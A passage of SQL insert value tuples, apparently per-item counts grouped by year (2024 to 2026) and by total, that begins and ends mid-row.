52),(5334,3,'2024',52),(1701,3,'2024',53),(1709,3,'2024',53),(1730,3,'2024',53),(2748,3,'2024',53),(3287,3,'2024',53),(4368,3,'2024',53),(4400,3,'2024',53),(4454,3,'2024',53),(4750,3,'2024',53),(3243,3,'2024',54),(3738,3,'2024',54),(4329,3,'2024',54),(4524,3,'2024',54),(5128,3,'2024',54),(5140,3,'2024',54),(5292,3,'2024',54),(481,3,'2024',55),(2252,3,'2024',55),(3290,3,'2024',55),(4323,3,'2024',55),(4432,3,'2024',55),(5062,3,'2024',55),(5137,3,'2024',55),(2178,3,'2024',56),(2956,3,'2024',56),(4448,3,'2024',56),(4582,3,'2024',56),(4648,3,'2024',56),(5024,3,'2024',56),(5071,3,'2024',56),(5310,3,'2024',56),(4377,3,'2024',57),(4566,3,'2024',57),(4694,3,'2024',57),(4983,3,'2024',57),(5067,3,'2024',57),(5268,3,'2024',57),(5353,3,'2024',57),(482,3,'2024',58),(1720,3,'2024',58),(3109,3,'2024',58),(3297,3,'2024',58),(4335,3,'2024',58),(4612,3,'2024',58),(1604,3,'2024',59),(1695,3,'2024',59),(2159,3,'2024',59),(3041,3,'2024',59),(3124,3,'2024',59),(4663,3,'2024',59),(4977,3,'2024',59),(1606,3,'2024',60),(3087,3,'2024',60),(3253,3,'2024',60),(4338,3,'2024',60),(5289,3,'2024',60),(3430,3,'2024',61),(4654,3,'2024',61),(1726,3,'2024',62),(2248,3,'2024',62),(2293,3,'2024',62),(3479,3,'2024',62),(4529,3,'2024',62),(5046,3,'2024',62),(3083,3,'2024',63),(3090,3,'2024',63),(3127,3,'2024',63),(4685,3,'2024',63),(5276,3,'2024',63),(5356,3,'2024',63),(108,3,'2024',64),(478,3,'2024',64),(488,3,'2024',64),(2063,3,'2024',64),(3038,3,'2024',64),(3265,3,'2024',64),(4396,3,'2024',64),(4677,3,'2024',64),(5101,3,'2024',64),(484,3,'2024',65),(3541,3,'2024',65),(5264,3,'2024',65),(476,3,'2024',67),(480,3,'2024',67),(4238,3,'2024',67),(4722,3,'2024',67),(472,3,'2024',68),(2558,3,'2024',68),(3107,3,'2024',68),(5301,3,'2024',68),(1718,3,'2024',69),(1734,3,'2024',69),(3285,3,'2024',69),(4674,3,'2024',69),(5374,3,'2024',69),(2813,3,'2024',70),(3746,3,'2024',70),(5330,3,'2024',70),(1608,3,'2024',71),(2152,3,'2024',71),(2769,3,'2024',71),(3771,3,'2024',71),(5314,3,'2024',71),(1590,3,'2024',72),(1703,3,'2024',72),(4391,3,'2024',72),(570,3,'2024',73),(4357,3,'2024',73),(5080,3,'2024',73),(1588,3,'2024',74),(5359,3,'2024',74),(3096,3,'2024',75),(479,3,'2024',76),(2964,3,'2024',76),(3006,3,'2024',76),(3104,3,'2024',76),(5050,3,'2024',76),(2965,3,'2024',77),(4765,3,'2024',77),(3489,3,'2024',78),(1776,3,'2024',79),(3245,3,'2024',79),(469,3,'2024',80),(2154,3,'2024',80),(3226,3,'2024',80),(477,3,'2024',81),(3102,3,'2024',81),(5125,3,'2024',81),(1774,3,'2024',82),(2617,3,'2024',82),(3534,3,'2024',82),(4771,3,'2024',82),(2801,3,'2024',84),(5131,3,'2024',84),(1610,3,'2024',86),(1722,3,'2024',86),(4301,3,'2024',86),(487,3,'2024',87),(1711,3,'2024',88),(2775,3,'2024',88),(3249,3,'2024',88),(335,3,'2024',90),(3117,3,'2024',90),(3749,3,'2024',90),(467,3,'2024',91),(2297,3,'2024',91),(4517,3,'2024',91),(4996,3,'2024',92),(2161,3,'2024',93),(5146,3,'2024',93),(4866,3,'2024',96),(1612,3,'2024',97),(4363,3,'2024',97),(3023,3,'2024',98),(471,3,'2024',99),(4551,3,'2024',99),(74,3,'2024',100),(84,3,'2024',103),(1770,3,'2024',103),(2809,3,'2024',103),(3097,3,'2024',103),(2609,3,'2024',104),(474,3,'2024',105),(4542,3,'2024',105),(4645,3,'2024',105),(3004,3,'2024',106),(3030,3,'2024',107),(1745,3,'2024',108),(3263,3,'2024',108),(1732,3,'2024',109),(2503,3,'2024',109),(4457,3,'2024',109),(3066,3,'2024',112),(4416,3,'2024',112),(4776,3,'2024',112),(1592,3,'2024',113),(4520,3,'2024',113),(3005,3,'2024',114),(4930,3,'2024',115),(3069,3,'2024',116),(468,3,'2024',121),(91,3,'2024',122),(1728,3,'2024',124),(2165,3,'2024',127),(473,3,'2024',128),(1600,3,'2024',128),(1598,3,'2024',129),(2658,3,'2024',129),(76,3,'2024',130),(3092,3,'2024',132),(1614,3,'2024',134),(3261,3,'2024',135),(3079,3,'2024',136),(1772,3,'2024',137),(1766,3,'2024',138),(1780,3,'2024',138),(4412,3,'2024',138),(2457,3,'2024',139),(4759,3,'2024',140),(2309,3,'2024',141),(2751,3,'2024',141),(1594,3,'2024',143),(470,3,'2024',151),(5163,3,'2024',151),(1699,3,'2024',152),(4420,3,'2024',152),(1724,3,'2024',155),(5076,3,'2024',170),(2904,3,'2024',172),(1602,3,'2024',176),(1596,3,'2024',177),(87,3,'2024',182),(1743,3,'2024',188),(1544,3,'2024',200),(1749,3,'2024',222),(3764,3,'2024',235),(72,3,'2024',249),(89,3,'2024',265),(1582,3,'2024',299),(1586,3,'2024',338),(3060,3,'2024',432),(3781,3,'2024',440),(2148,3,'2024',495),(3247,3,'2024',878),(68,3,'2024',1390),(80,3,'2024',2817),(9,3,'2024',643758),(5666,3,'2025',46),(5674,3,'2025',62),(5609,3,'2025',94),(106,3,'2025',109),(5636,3,'2025',124),(5626,3,'2025',141),(5662,3,'2025',151),(5683,3,'2025',160),(4858,3,'2025',164),(1697,3,'2025',172),(4357,3,'2025',181),(4870,3,'2025',196),(4404,3,'2025',199),(4878,3,'2025',200),(3280,3,'2025',205),(3714,3,'2025',217),(3109,3,'2025',218),(4387,3,'2025',220),(5028,3,'2025',220),(102,3,'2025',225),(2991,3,'2025',226),(3104,3,'2025',226),(3107,3,'2025',226),(4691,3,'2025',226),(3096,3,'2025',227),(3092,3,'2025',231),(5326,3,'2025',232),(4391,3,'2025',233),(5080,3,'2025',236),(3282,3,'2025',237),(4744,3,'2025',238),(1695,3,'2025',239),(3287,3,'2025',240),(5256,3,'2025',243),(3541,3,'2025',247),(4668,3,'2025',247),(1734,3,'2025',248),(3746,3,'2025',251),(4762,3,'2025',252),(3090,3,'2025',261),(4674,3,'2025',263),(4768,3,'2025',264),(5268,3,'2025',267),(3097,3,'2025',274),(4238,3,'2025',275),(5134,3,'2025',284),(110,3,'2025',285),(4663,3,'2025',292),(1592,3,'2025',298),(4587,3,'2025',315),(4977,3,'2025',315),(5140,3,'2025',324),(1596,3,'2025',333),(4980,3,'2025',333),(4400,3,'2025',339),(1606,3,'2025',351),(3038,3,'2025',351),(4776,3,'2025',388),(4591,3,'2025',401),(3297,3,'2025',409),(2297,3,'2025',428),(1602,3,'2025',435),(5567,3,'2025',442),(3102,3,'2025',467),(2293,3,'2025',473),(2296,3,'2025',474),(1728,3,'2025',485),(2156,3,'2025',498),(1588,3,'2025',501),(1709,3,'2025',514),(2248,3,'2025',514),(1747,3,'2025',519),(4428,3,'2025',524),(1772,3,'2025',525),(2252,3,'2025',527),(1732,3,'2025',535),(4883,3,'2025',545),(1720,3,'2025',549),(4363,3,'2025',558),(3269,3,'2025',559),(4797,3,'2025',560),(1745,3,'2025',562),(1713,3,'2025',567),(5050,3,'2025',569),(3249,3,'2025',572),(1707,3,'2025',575),(3257,3,'2025',577),(3072,3,'2025',578),(3273,3,'2025',582),(4416,3,'2025',582),(4802,3,'2025',584),(4706,3,'2025',585),(5046,3,'2025',585),(5020,3,'2025',586),(1715,3,'2025',588),(4436,3,'2025',588),(4382,3,'2025',589),(1741,3,'2025',590),(1751,3,'2025',591),(1737,3,'2025',593),(3245,3,'2025',594),(5024,3,'2025',594),(1743,3,'2025',595),(2063,3,'2025',595),(2993,3,'2025',595),(3267,3,'2025',595),(4897,3,'2025',595),(1739,3,'2025',597),(3063,3,'2025',597),(3265,3,'2025',597),(4792,3,'2025',597),(1749,3,'2025',598),(3263,3,'2025',598),(1726,3,'2025',599),(3285,3,'2025',599),(3727,3,'2025',599),(4862,3,'2025',600),(3079,3,'2025',601),(3738,3,'2025',603),(3278,3,'2025',607),(4440,3,'2025',607),(4700,3,'2025',609),(3240,3,'2025',613),(4654,3,'2025',614),(4765,3,'2025',614),(5037,3,'2025',614),(1730,3,'2025',615),(4326,3,'2025',615),(4408,3,'2025',616),(2150,3,'2025',617),(3127,3,'2025',618),(1768,3,'2025',619),(2748,3,'2025',619),(3124,3,'2025',619),(5042,3,'2025',620),(2161,3,'2025',621),(4444,3,'2025',621),(2154,3,'2025',622),(3066,3,'2025',623),(4546,3,'2025',623),(4685,3,'2025',623),(2148,3,'2025',624),(3034,3,'2025',624),(3243,3,'2025',624),(3275,3,'2025',624),(1705,3,'2025',625),(5054,3,'2025',625),(5253,3,'2025',626),(2152,3,'2025',627),(3261,3,'2025',627),(4424,3,'2025',628),(4703,3,'2025',628),(3087,3,'2025',630),(1699,3,'2025',632),(4709,3,'2025',633),(4771,3,'2025',633),(4396,3,'2025',634),(1711,3,'2025',635),(3045,3,'2025',635),(3316,3,'2025',635),(4368,3,'2025',635),(4373,3,'2025',636),(4866,3,'2025',637),(4888,3,'2025',637),(3229,3,'2025',638),(4542,3,'2025',639),(1782,3,'2025',640),(3735,3,'2025',640),(3531,3,'2025',642),(3430,3,'2025',643),(4677,3,'2025',644),(4893,3,'2025',644),(2964,3,'2025',645),(3731,3,'2025',645),(4747,3,'2025',645),(4338,3,'2025',648),(5122,3,'2025',652),(4432,3,'2025',654),(4657,3,'2025',654),(4448,3,'2025',655),(4514,3,'2025',655),(3251,3,'2025',656),(4332,3,'2025',656),(5472,3,'2025',656),(2178,3,'2025',657),(4329,3,'2025',658),(3271,3,'2025',659),(3307,3,'2025',660),(482,3,'2025',661),(5137,3,'2025',662),(4275,3,'2025',663),(483,3,'2025',664),(4377,3,'2025',664),(2165,3,'2025',665),(1776,3,'2025',666),(2965,3,'2025',666),(5271,3,'2025',666),(3534,3,'2025',667),(4517,3,'2025',667),(5295,3,'2025',667),(3721,3,'2025',668),(3771,3,'2025',668),(4608,3,'2025',668),(3479,3,'2025',670),(1701,3,'2025',671),(4323,3,'2025',671),(1590,3,'2025',672),(3290,3,'2025',672),(2609,3,'2025',674),(3027,3,'2025',674),(4688,3,'2025',674),(4694,3,'2025',674),(2751,3,'2025',675),(3438,3,'2025',675),(4454,3,'2025',676),(480,3,'2025',677),(4648,3,'2025',677),(4651,3,'2025',678),(2159,3,'2025',679),(4756,3,'2025',680),(3226,3,'2025',681),(3259,3,'2025',681),(5289,3,'2025',682),(4988,3,'2025',683),(4697,3,'2025',684),(5033,3,'2025',684),(5383,3,'2025',684),(2989,3,'2025',685),(3041,3,'2025',686),(3117,3,'2025',686),(3742,3,'2025',686),(4566,3,'2025',686),(479,3,'2025',687),(1722,3,'2025',687),(4341,3,'2025',687),(4874,3,'2025',687),(5330,3,'2025',688),(4996,3,'2025',689),(478,3,'2025',691),(3005,3,'2025',691),(3004,3,'2025',692),(3724,3,'2025',693),(4551,3,'2025',693),(5058,3,'2025',693),(4741,3,'2025',694),(1774,3,'2025',695),(3482,3,'2025',695),(4335,3,'2025',695),(3774,3,'2025',696),(4759,3,'2025',696),(5298,3,'2025',697),(5374,3,'2025',697),(4645,3,'2025',698),(4976,3,'2025',698),(5359,3,'2025',698),(4412,3,'2025',699),(1770,3,'2025',700),(2558,3,'2025',700),(5131,3,'2025',700),(5146,3,'2025',700),(5320,3,'2025',700),(2617,3,'2025',701),(3777,3,'2025',701),(4681,3,'2025',701),(5248,3,'2025',701),(485,3,'2025',703),(4524,3,'2025',703),(5101,3,'2025',703),(5314,3,'2025',703),(5264,3,'2025',704),(3006,3,'2025',705),(4582,3,'2025',705),(5128,3,'2025',705),(5378,3,'2025',707),(3752,3,'2025',709),(3710,3,'2025',710),(5301,3,'2025',710),(5304,3,'2025',710),(477,3,'2025',711),(1718,3,'2025',711),(3489,3,'2025',711),(5292,3,'2025',711),(5317,3,'2025',712),(1703,3,'2025',713),(4457,3,'2025',714),(3030,3,'2025',715),(488,3,'2025',716),(4753,3,'2025',716),(484,3,'2025',718),(5067,3,'2025',719),(5071,3,'2025',719),(5310,3,'2025',719),(5457,3,'2025',720),(3069,3,'2025',721),(486,3,'2025',722),(4301,3,'2025',722),(3498,3,'2025',724),(5489,3,'2025',724),(3253,3,'2025',727),(1780,3,'2025',728),(4722,3,'2025',728),(3486,3,'2025',731),(1724,3,'2025',732),(5585,3,'2025',732),(5307,3,'2025',733),(5353,3,'2025',733),(481,3,'2025',734),(5334,3,'2025',734),(5153,3,'2025',735),(5323,3,'2025',735),(3749,3,'2025',736),(471,3,'2025',737),(2801,3,'2025',737),(5467,3,'2025',737),(5125,3,'2025',738),(1610,3,'2025',743),(570,3,'2025',744),(476,3,'2025',745),(2457,3,'2025',745),(5415,3,'2025',745),(4712,3,'2025',747),(4660,3,'2025',749),(3764,3,'2025',750),(1594,3,'2025',751),(2956,3,'2025',752),(2658,3,'2025',757),(4529,3,'2025',757),(2911,3,'2025',758),(472,3,'2025',759),(3313,3,'2025',760),(4520,3,'2025',763),(5356,3,'2025',772),(2809,3,'2025',773),(4420,3,'2025',780),(4983,3,'2025',784),(2804,3,'2025',786),(5363,3,'2025',789),(1586,3,'2025',797),(4750,3,'2025',797),(3247,3,'2025',799),(2769,3,'2025',800),(5157,3,'2025',800),(4556,3,'2025',802),(5163,3,'2025',803),(1612,3,'2025',810),(1614,3,'2025',812),(4612,3,'2025',813),(5280,3,'2025',816),(1766,3,'2025',817),(1604,3,'2025',818),(1584,3,'2025',829),(5601,3,'2025',835),(1600,3,'2025',836),(469,3,'2025',863),(5062,3,'2025',875),(2309,3,'2025',891),(5578,3,'2025',897),(3023,3,'2025',904),(5582,3,'2025',909),(3083,3,'2025',913),(5593,3,'2025',922),(5259,3,'2025',923),(5492,3,'2025',937),(2775,3,'2025',945),(5276,3,'2025',947),(1608,3,'2025',948),(5515,3,'2025',956),(5433,3,'2025',963),(1598,3,'2025',968),(5461,3,'2025',973),(487,3,'2025',983),(5076,3,'2025',986),(5412,3,'2025',1001),(5464,3,'2025',1005),(5400,3,'2025',1016),(473,3,'2025',1021),(1778,3,'2025',1023),(5512,3,'2025',1028),(5449,3,'2025',1044),(5561,3,'2025',1055),(5598,3,'2025',1058),(5425,3,'2025',1067),(5454,3,'2025',1089),(5605,3,'2025',1089),(5570,3,'2025',1091),(2704,3,'2025',1095),(2813,3,'2025',1117),(5409,3,'2025',1131),(74,3,'2025',1158),(468,3,'2025',1158),(5428,3,'2025',1172),(4930,3,'2025',1175),(1544,3,'2025',1177),(5397,3,'2025',1202),(5436,3,'2025',1208),(467,3,'2025',1248),(108,3,'2025',1273),(5441,3,'2025',1286),(84,3,'2025',1291),(474,3,'2025',1348),(5502,3,'2025',1357),(5420,3,'2025',1448),(87,3,'2025',1478),(5406,3,'2025',1539),(3060,3,'2025',1561),(335,3,'2025',1613),(76,3,'2025',1656),(2904,3,'2025',1664),(91,3,'2025',1731),(470,3,'2025',1773),(1582,3,'2025',1781),(3781,3,'2025',1812),(2503,3,'2025',2011),(89,3,'2025',2835),(68,3,'2025',3743),(72,3,'2025',4041),(80,3,'2025',35058),(9,3,'2025',561855),(5961,3,'2026',29),(5964,3,'2026',32),(5975,3,'2026',35),(5967,3,'2026',36),(5986,3,'2026',41),(5917,3,'2026',42),(5921,3,'2026',44),(5945,3,'2026',52),(5925,3,'2026',53),(5889,3,'2026',61),(5950,3,'2026',73),(5930,3,'2026',75),(5902,3,'2026',96),(2293,3,'2026',105),(2296,3,'2026',108),(106,3,'2026',109),(1720,3,'2026',116),(4428,3,'2026',116),(1709,3,'2026',118),(3285,3,'2026',118),(5046,3,'2026',118),(5910,3,'2026',118),(3257,3,'2026',119),(4858,3,'2026',119),(2248,3,'2026',120),(5042,3,'2026',120),(1732,3,'2026',124),(2161,3,'2026',127),(3247,3,'2026',129),(3280,3,'2026',129),(5906,3,'2026',131),(1695,3,'2026',132),(1697,3,'2026',132),(4888,3,'2026',132),(3273,3,'2026',133),(4440,3,'2026',133),(1737,3,'2026',134),(2156,3,'2026',135),(2165,3,'2026',135),(2154,3,'2026',138),(2252,3,'2026',138),(3714,3,'2026',138),(1699,3,'2026',139),(4357,3,'2026',139),(3261,3,'2026',140),(4432,3,'2026',140),(4546,3,'2026',140),(4893,3,'2026',140),(4373,3,'2026',141),(2063,3,'2026',142),(4797,3,'2026',142),(3245,3,'2026',143),(3771,3,'2026',143),(5020,3,'2026',143),(5037,3,'2026',143),(3269,3,'2026',144),(4706,3,'2026',144),(1751,3,'2026',145),(3107,3,'2026',145),(3229,3,'2026',145),(3287,3,'2026',145),(4514,3,'2026',146),(4792,3,'2026',146),(3249,3,'2026',147),(3109,3,'2026',148),(1745,3,'2026',149),(3275,3,'2026',149),(4382,3,'2026',149),(4883,3,'2026',149),(1749,3,'2026',150),(1707,3,'2026',151),(3263,3,'2026',151),(4444,3,'2026',151),(5050,3,'2026',151),(1776,3,'2026',152),(4391,3,'2026',152),(4404,3,'2026',152),(3092,3,'2026',153),(4870,3,'2026',153),(3097,3,'2026',154),(3278,3,'2026',154),(1768,3,'2026',155),(4681,3,'2026',155),(4897,3,'2026',155),(1782,3,'2026',156),(3096,3,'2026',156),(4591,3,'2026',156),(5024,3,'2026',156),(5289,3,'2026',156),(1713,3,'2026',157),(2178,3,'2026',157),(3271,3,'2026',157),(4691,3,'2026',157),(4862,3,'2026',158),(4988,3,'2026',158),(2991,3,'2026',159),(2993,3,'2026',159),(3482,3,'2026',159),(3489,3,'2026',159),(4412,3,'2026',159),(1726,3,'2026',160),(2150,3,'2026',160),(4416,3,'2026',160),(4648,3,'2026',160),(4688,3,'2026',160),(5865,3,'2026',160),(5868,3,'2026',160),(3282,3,'2026',161),(3079,3,'2026',162),(3430,3,'2026',162),(4654,3,'2026',162),(4709,3,'2026',162),(5058,3,'2026',162),(2751,3,'2026',163),(3104,3,'2026',163),(3265,3,'2026',163),(4408,3,'2026',163),(4657,3,'2026',163),(3316,3,'2026',164),(4377,3,'2026',164),(4674,3,'2026',164),(3531,3,'2026',165),(4323,3,'2026',165),(4517,3,'2026',165),(4756,3,'2026',165),(4768,3,'2026',165),(5140,3,'2026',165),(3243,3,'2026',166),(4694,3,'2026',166),(478,3,'2026',167),(4976,3,'2026',167),(5295,3,'2026',167),(2609,3,'2026',168),(2748,3,'2026',168),(4387,3,'2026',168),(4765,3,'2026',168),(5028,3,'2026',168),(3735,3,'2026',170),(4338,3,'2026',170),(4685,3,'2026',170),(4762,3,'2026',170),(1730,3,'2026',171),(4275,3,'2026',171),(4329,3,'2026',171),(4341,3,'2026',171),(5330,3,'2026',171),(482,3,'2026',172),(1743,3,'2026',172),(4878,3,'2026',172),(3727,3,'2026',173),(4668,3,'2026',173),(4697,3,'2026',173),(3534,3,'2026',174),(4332,3,'2026',174),(5256,3,'2026',174),(5383,3,'2026',174),(4771,3,'2026',175),(486,3,'2026',176),(2148,3,'2026',176),(3721,3,'2026',176),(4996,3,'2026',177),(5248,3,'2026',178),(1701,3,'2026',179),(1739,3,'2026',179),(1772,3,'2026',179),(2965,3,'2026',179),(4424,3,'2026',179),(4363,3,'2026',180),(4700,3,'2026',180),(4703,3,'2026',180),(480,3,'2026',182),(3226,3,'2026',182),(4396,3,'2026',183),(479,3,'2026',184),(1711,3,'2026',184),(3746,3,'2026',184),(5320,3,'2026',184),(481,3,'2026',185),(5875,3,'2026',186),(3752,3,'2026',187),(4677,3,'2026',187),(4744,3,'2026',187),(4802,3,'2026',187),(484,3,'2026',188),(5301,3,'2026',188),(5323,3,'2026',188),(5833,3,'2026',188),(4566,3,'2026',189),(4582,3,'2026',189),(5425,3,'2026',189),(1734,3,'2026',191),(3240,3,'2026',191),(5356,3,'2026',191),(2911,3,'2026',192),(4587,3,'2026',192),(4741,3,'2026',192),(5054,3,'2026',192),(3267,3,'2026',193),(2964,3,'2026',194),(3479,3,'2026',194),(5125,3,'2026',194),(5134,3,'2026',194),(3069,3,'2026',195),(3034,3,'2026',197),(3066,3,'2026',197),(3486,3,'2026',197),(3731,3,'2026',197),(5128,3,'2026',197),(4663,3,'2026',198),(4866,3,'2026',198),(3127,3,'2026',199),(3259,3,'2026',199),(4747,3,'2026',199),(5317,3,'2026',199),(110,3,'2026',200),(5122,3,'2026',200),(488,3,'2026',201),(1715,3,'2026',201),(3742,3,'2026',201),(2809,3,'2026',202),(3738,3,'2026',202),(1703,3,'2026',203),(2152,3,'2026',203),(3777,3,'2026',203),(5881,3,'2026',203),(3063,3,'2026',204),(4400,3,'2026',204),(5585,3,'2026',204),(3027,3,'2026',205),(4454,3,'2026',206),(4651,3,'2026',206),(4874,3,'2026',206),(5872,3,'2026',206),(5146,3,'2026',207),(477,3,'2026',208),(2989,3,'2026',208),(1590,3,'2026',209),(3090,3,'2026',209),(4712,3,'2026',209),(5253,3,'2026',209),(5378,3,'2026',209),(3072,3,'2026',210),(4326,3,'2026',210),(4457,3,'2026',210),(4551,3,'2026',210),(4608,3,'2026',210),(5137,3,'2026',210),(5609,3,'2026',211),(483,3,'2026',212),(3041,3,'2026',212),(3498,3,'2026',212),(5131,3,'2026',212),(5264,3,'2026',212),(5292,3,'2026',213),(5472,3,'2026',213),(3045,3,'2026',214),(4750,3,'2026',214),(3774,3,'2026',215),(4542,3,'2026',215),(5878,3,'2026',215),(3290,3,'2026',216),(3438,3,'2026',216),(5101,3,'2026',216),(1766,3,'2026',217),(5304,3,'2026',217),(5359,3,'2026',217),(5582,3,'2026',217),(3117,3,'2026',218),(1722,3,'2026',219),(1770,3,'2026',219),(2801,3,'2026',219),(3724,3,'2026',220),(4368,3,'2026',220),(4983,3,'2026',221),(3124,3,'2026',222),(3313,3,'2026',222),(5314,3,'2026',222),(5334,3,'2026',223),(5636,3,'2026',224),(5067,3,'2026',225),(5326,3,'2026',226),(5374,3,'2026',226),(3005,3,'2026',227),(4448,3,'2026',227),(5153,3,'2026',228),(5271,3,'2026',229),(5310,3,'2026',229),(4524,3,'2026',232),(5467,3,'2026',232),(5828,3,'2026',232),(102,3,'2026',234),(485,3,'2026',234),(2617,3,'2026',237),(5412,3,'2026',237),(4759,3,'2026',239),(3307,3,'2026',240),(4529,3,'2026',242),(5298,3,'2026',243),(2956,3,'2026',244),(3253,3,'2026',247),(1592,3,'2026',248),(5062,3,'2026',248),(5824,3,'2026',248),(5816,3,'2026',249),(1705,3,'2026',250),(2658,3,'2026',250),(2457,3,'2026',251),(1596,3,'2026',252),(3710,3,'2026',252),(4301,3,'2026',252),(4238,3,'2026',255),(5578,3,'2026',255),(3030,3,'2026',258),(2159,3,'2026',259),(476,3,'2026',260),(1610,3,'2026',260),(1606,3,'2026',261),(3006,3,'2026',261),(4660,3,'2026',262),(4753,3,'2026',263),(5033,3,'2026',263),(5515,3,'2026',265),(4645,3,'2026',266),(5080,3,'2026',267),(5512,3,'2026',268),(3023,3,'2026',269),(5561,3,'2026',270),(4776,3,'2026',271),(5666,3,'2026',271),(5844,3,'2026',272),(2558,3,'2026',273),(5157,3,'2026',273),(5276,3,'2026',273),(5353,3,'2026',273),(3004,3,'2026',275),(4977,3,'2026',275),(4980,3,'2026',275),(5567,3,'2026',276),(3749,3,'2026',278),(471,3,'2026',281),(4612,3,'2026',286),(472,3,'2026',287),(5461,3,'2026',287),(5674,3,'2026',287),(1774,3,'2026',288),(5449,3,'2026',288),(5771,3,'2026',288),(5662,3,'2026',290),(4420,3,'2026',291),(5163,3,'2026',291),(5268,3,'2026',291),(5492,3,'2026',295),(1612,3,'2026',299),(3764,3,'2026',300),(5280,3,'2026',301),(4436,3,'2026',305),(3297,3,'2026',308),(1747,3,'2026',309),(1724,3,'2026',310),(5363,3,'2026',311),(5464,3,'2026',312),(4556,3,'2026',313),(5605,3,'2026',313),(2309,3,'2026',315),(5441,3,'2026',315),(5683,3,'2026',315),(1594,3,'2026',316),(3251,3,'2026',316),(2297,3,'2026',318),(5415,3,'2026',318),(1604,3,'2026',321),(4722,3,'2026',323),(4335,3,'2026',326),(5735,3,'2026',326),(5071,3,'2026',339),(1600,3,'2026',342),(5821,3,'2026',344),(5884,3,'2026',344),(5307,3,'2026',349),(5570,3,'2026',349),(5601,3,'2026',350),(1584,3,'2026',353),(570,3,'2026',355),(5598,3,'2026',356),(469,3,'2026',360),(5626,3,'2026',361),(4520,3,'2026',368),(5409,3,'2026',369),(1728,3,'2026',371),(2775,3,'2026',372),(2804,3,'2026',372),(5457,3,'2026',372),(1778,3,'2026',374),(5738,3,'2026',379),(5400,3,'2026',381),(5847,3,'2026',381),(5785,3,'2026',385),(5859,3,'2026',386),(1718,3,'2026',391),(5433,3,'2026',394),(1598,3,'2026',395),(1608,3,'2026',397),(5778,3,'2026',399),(5259,3,'2026',401),(5428,3,'2026',403),(3083,3,'2026',406),(467,3,'2026',411),(5700,3,'2026',411),(3102,3,'2026',416),(2813,3,'2026',417),(2769,3,'2026',418),(487,3,'2026',429),(1780,3,'2026',429),(1588,3,'2026',452),(473,3,'2026',458),(5436,3,'2026',459),(5696,3,'2026',470),(5076,3,'2026',475),(2704,3,'2026',478),(1586,3,'2026',484),(1614,3,'2026',487),(3087,3,'2026',492),(5762,3,'2026',497),(5454,3,'2026',503),(5489,3,'2026',503),(1544,3,'2026',516),(5769,3,'2026',523),(5593,3,'2026',568),(5420,3,'2026',575),(468,3,'2026',579),(3038,3,'2026',611),(74,3,'2026',620),(335,3,'2026',670),(1602,3,'2026',671),(2503,3,'2026',673),(470,3,'2026',676),(87,3,'2026',695),(4930,3,'2026',708),(108,3,'2026',718),(5406,3,'2026',734),(5397,3,'2026',761),(474,3,'2026',775),(84,3,'2026',919),(3781,3,'2026',923),(1582,3,'2026',950),(5502,3,'2026',1036),(76,3,'2026',1255),(91,3,'2026',1273),(3541,3,'2026',1312),(1741,3,'2026',1318),(68,3,'2026',1333),(2904,3,'2026',1523),(72,3,'2026',2098),(89,3,'2026',2143),(3060,3,'2026',4041),(80,3,'2026',5116),(9,3,'2026',99810),(3235,4,'total',0),(4905,4,'total',0),(4914,4,'total',0),(5959,4,'total',0),(3140,4,'total',1),(3142,4,'total',1),(3144,4,'total',1),(3151,4,'total',1),(5961,4,'total',29),(5964,4,'total',32),(5975,4,'total',35),(5967,4,'total',36),(5986,4,'total',41),(5917,4,'total',42),(5921,4,'total',44),(5945,4,'total',52),(5925,4,'total',53),(5889,4,'total',61),(5950,4,'total',73),(5930,4,'total',75),(5902,4,'total',96),(5910,4,'total',118),(3081,4,'total',122),(5906,4,'total',131),(5865,4,'total',160),(5868,4,'total',160),(5875,4,'total',186),(5833,4,'total',188),(5881,4,'total',203),(5872,4,'total',206),(5878,4,'total',215),(5828,4,'total',232),(5816,4,'total',248),(5824,4,'total',248),(5844,4,'total',272),(5771,4,'total',288),(5609,4,'total',305),(5666,4,'total',317),(5735,4,'total',326),(5821,4,'total',344),(5884,4,'total',344),(5636,4,'total',348),(5674,4,'total',349),(5738,4,'total',379),(5847,4,'total',381),(5785,4,'total',385),(5859,4,'total',386),(5778,4,'total',399),(5700,4,'total',411),(106,4,'total',429),(5662,4,'total',441),(5696,4,'total',470),(5683,4,'total',475),(4858,4,'total',493),(5762,4,'total',497),(5626,4,'total',502),(5769,4,'total',523),(4870,4,'total',587),(4878,4,'total',588),(5326,4,'total',613),(5028,4,'total',652),(5567,4,'total',677),(4668,4,'total',708),(4744,4,'total',722),(110,4,'total',741),(4357,4,'total',756),(4691,4,'total',772),(4387,4,'total',797),(4762,4,'total',810),(5140,4,'total',810),(4404,4,'total',825),(5256,4,'total',826),(4768,4,'total',827),(5268,4,'total',839),(4591,4,'total',863),(5472,4,'total',869),(5080,4,'total',886),(5383,4,'total',895),(4883,4,'total',904),(5134,4,'total',907),(4587,4,'total',921),(4797,4,'total',925),(5585,4,'total',936),(5020,4,'total',941),(3280,4,'total',947),(5378,4,'total',959),(5467,4,'total',969),(4792,4,'total',970),(4980,4,'total',981),(4862,4,'total',982),(5046,4,'total',990),(4897,4,'total',991),(1697,4,'total',993),(5042,4,'total',994),(4977,4,'total',999),(5374,4,'total',1006),(4802,4,'total',1015),(4888,4,'total',1018),(5024,4,'total',1019),(5050,4,'total',1021),(3096,4,'total',1026),(4893,4,'total',1026),(5037,4,'total',1028),(5330,4,'total',1030),(5289,4,'total',1035),(3714,4,'total',1040),(5295,4,'total',1051),(5415,4,'total',1063),(4391,4,'total',1081),(102,4,'total',1082),(4428,4,'total',1084),(4674,4,'total',1091),(5457,4,'total',1091),(3109,4,'total',1093),(5248,4,'total',1095),(5054,4,'total',1110),(3746,4,'total',1111),(5301,4,'total',1112),(5271,4,'total',1124),(5582,4,'total',1126),(4688,4,'total',1132),(4382,4,'total',1134),(5292,4,'total',1134),(4546,4,'total',1135),(1734,4,'total',1142),(5323,4,'total',1142),(2991,4,'total',1147),(4648,4,'total',1147),(5298,4,'total',1148),(4866,4,'total',1149),(5058,4,'total',1150),(5578,4,'total',1152),(5320,4,'total',1156),(1695,4,'total',1157),(3097,4,'total',1157),(4756,4,'total',1158),(4440,4,'total',1167),(4741,4,'total',1168),(4681,4,'total',1169),(4408,4,'total',1172),(4776,4,'total',1173),(5317,4,'total',1174),(3727,4,'total',1176),(5304,4,'total',1180),(3104,4,'total',1181),(3269,4,'total',1182),(4663,4,'total',1182),(4747,4,'total',1182),(5310,4,'total',1183),(5601,4,'total',1185),(4373,4,'total',1187),(4874,4,'total',1192),(5253,4,'total',1193),(4685,4,'total',1198),(4988,4,'total',1198),(5359,4,'total',1200),(5314,4,'total',1202),(5363,4,'total',1204),(5515,4,'to